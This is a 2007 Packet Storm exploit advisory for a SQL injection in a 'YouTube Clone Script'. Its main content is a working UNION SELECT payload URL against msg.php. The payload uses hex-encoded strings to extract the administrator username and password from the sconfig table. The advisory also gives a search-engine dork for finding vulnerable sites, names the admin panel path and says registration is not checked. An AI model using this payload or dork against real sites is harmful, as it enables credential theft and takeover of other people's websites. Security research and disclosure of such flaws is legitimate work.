youtube-sql.txt

2007-07-02T00:00:00
ID PACKETSTORM:57420
Type packetstorm
Reporter t0pp8uzz
Modified 2007-07-02T00:00:00

Description

                                        
                                            `--==+================================================================================+==--  
--==+ YouTube Clone Script SQL Injection Vulnerability +==--  
--==+================================================================================+==--  
  
  
  
AUTHOR: t0pP8uZz & xprog  
SITE: http://www.hispah.com/index.php?act=viewProd&productId=20  
DORK: allinurl:"channel_detail.php?chid="  
  
DESCRIPTION:  
Remote SQL injection in msg.php id, able to pull admin user/pass.  
  
EXPLOIT:  
http://site.com/path/msg.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,0x7430705038755A7A20616E64207870726F67206F776E616765,convert(concat((SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F6E616D65),0x3a,(SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F70617373))/**/using/**/latin1),4,5,6,7,8,9/*  
  
  
Tip/Note:  
Majority of the sites require login to view msg.php None of the registration info is checked.  
  
Admin Panel is in /siteadmin/  
  
  
  
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !  
  
  
--==+================================================================================+==--  
--==+ YouTube Clone Script SQL Injection Vulnerability +==--  
--==+================================================================================+==--  
`